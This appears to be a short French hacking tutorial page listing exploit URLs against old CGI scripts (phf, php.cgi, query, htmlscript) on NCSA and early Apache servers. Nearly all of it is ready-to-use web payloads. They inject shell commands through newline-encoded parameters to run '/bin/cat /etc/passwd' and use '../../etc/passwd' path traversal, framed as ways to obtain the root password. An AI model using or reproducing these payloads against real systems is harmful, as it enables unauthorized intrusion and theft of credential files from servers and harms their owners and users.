
Télécharger
Wwwscan
Pfs:
Pour obtenir le password root sur
les serveur tournant sous NCSA (version inférieure ou
égale à 1.5 ) et sous apache (versions inférieures
à 1.0.5):
http://urldusite/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
ou
http://urldusite/cgi-bin/phf?Qname=x%0a/bin/cat%20/etc/passwd
Php:
Pour obtenir le password root avec
php:
http://urldusite/cgi-bin/php.cgi?/etc/passwd
ou
http://urldusite/cgi-bin/php?/etc/passwd
Query:
Pour obtenir le password root avec
query:
http://urldusite/cgi-bin/query?%0a/bin/cat%20/etc/passwd
Htmlscript:
Pour obtenir le password root, le
tout est de savoir où se trouve le répertoire /etc
par rapport au cgi-bin. Si vous connaissez un peu l'arborescence
des répertoires sous UNIX, vous n'êtes pas obligé
de mettre /etc/passwd:
http://urldusite/cgi-bin/htmlscript?../../etc/passwd |